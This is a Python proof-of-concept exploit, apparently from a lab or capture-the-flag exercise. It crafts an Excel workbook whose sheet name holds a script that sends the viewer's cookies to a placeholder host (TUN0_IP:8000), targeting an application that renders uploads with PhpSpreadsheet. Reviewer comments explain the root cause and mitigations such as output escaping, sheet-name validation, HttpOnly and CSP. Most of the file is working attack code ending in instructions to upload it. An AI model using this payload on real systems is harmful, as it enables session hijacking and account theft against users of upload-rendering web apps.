POC / exploit3.py PY
import zipfile
import shutil
import os
from openpyxl import Workbook

# Proof of concept for a stored XSS delivered through a worksheet name.
# The script builds a two-sheet .xlsx with openpyxl, then rewrites
# xl/workbook.xml inside the archive so that the first sheet's name attribute
# holds an entity-encoded <script> element. Per the author's notes below, the
# target is an application that renders uploaded workbooks with PhpSpreadsheet.
#
# Defender notes (NOTE(review): root cause inferred from the author's comments,
# confirm against the PhpSpreadsheet version in use):
#   - The flaw class is missing output encoding: a sheet title is attacker-
#     controlled data and must be HTML-escaped wherever it is written into a page.
#   - The name written here is far longer than 31 characters and contains
#     '/', ':' and '?', none of which Excel accepts in a sheet name. An upload
#     validator that parses xl/workbook.xml and rejects such names stops this file.
#   - The script reads document.cookie, so session cookies flagged HttpOnly are
#     not exposed to it; a Content-Security-Policy that forbids inline script
#     prevents it from running at all.

# --- CONFIGURATION ---
# MY_IP and PORT form the URL the injected script sends the cookie string to;
# "TUN0_IP" is a placeholder string, not a real address.
# FILENAME is the workbook that is created, rewritten in place and left on disk.
MY_IP = "TUN0_IP"
PORT = "8000"
FILENAME = "assignment_exploit.xlsx"

# 1. Create a "Clean" Excel file first (Standard compliant)
# openpyxl produces a well-formed package; the sheet title is a marker string
# that step 3 searches for in the raw XML.
print("[*] Creating template Excel file...")
wb = Workbook()
ws = wb.active
ws.title = "INJECT_HERE" # Placeholder we will find and replace
wb.create_sheet("Sheet2") # Crucial: 2nd sheet is required to trigger the bug
# NOTE(review): the author states a second sheet is needed; presumably the
# vulnerable code path only lists sheet names when there is more than one sheet.
wb.save(FILENAME)

# 2. Define the Malicious Payload
# We must XML-encode the characters (< becomes &lt;) so the XML parser reads it,
# but PhpSpreadsheet converts it back to code.
# The entities keep workbook.xml well-formed. Any XML parser decodes them back to
# literal '<' and '>' when it reads the attribute, so the consumer holds a raw
# <script> string and is responsible for escaping it before output.
payload = f"&lt;script&gt;fetch('http://{MY_IP}:{PORT}/?c='+document.cookie)&lt;/script&gt;"

print(f"[*] Constructing payload: {payload}")

# 3. Inject the Payload manually using Zip manipulation
# We are bypassing OpenPyXL's validation by editing the raw XML.
# An .xlsx is a ZIP archive, so writer-side validation in a library is no
# control at all: the receiving application has to validate what it parses.
print("[*] Injecting payload into xl/workbook.xml...")

temp_file = "temp_exploit.xlsx"
# Copy existing xlsx to a temp file
# The copy is the read side; FILENAME is reopened in 'w' mode and rebuilt from it.
shutil.copyfile(FILENAME, temp_file)

with zipfile.ZipFile(temp_file, 'r') as zin:
    with zipfile.ZipFile(FILENAME, 'w') as zout:
        for item in zin.infolist():
            # Read the file content
            data = zin.read(item.filename)
            
            # If it's the workbook configuration, inject the payload
            if item.filename == 'xl/workbook.xml':
                # Replace the placeholder with our malicious XSS
                # We use .replace() on bytes
                # Only the name attribute of the first <sheet> element changes;
                # every other part of the package is copied through untouched.
                data = data.replace(b'name="INJECT_HERE"', f'name="{payload}"'.encode('utf-8'))
            
            # Write data back to the new zip
            # Passing the ZipInfo object reuses the original entry's metadata.
            zout.writestr(item, data)

# Cleanup
# Only the temporary copy is deleted; the rewritten workbook stays at FILENAME.
os.remove(temp_file)
print(f"[+] Success! Malicious file '{FILENAME}' created.")
print(f"[+] Upload this file to the Assignments page.")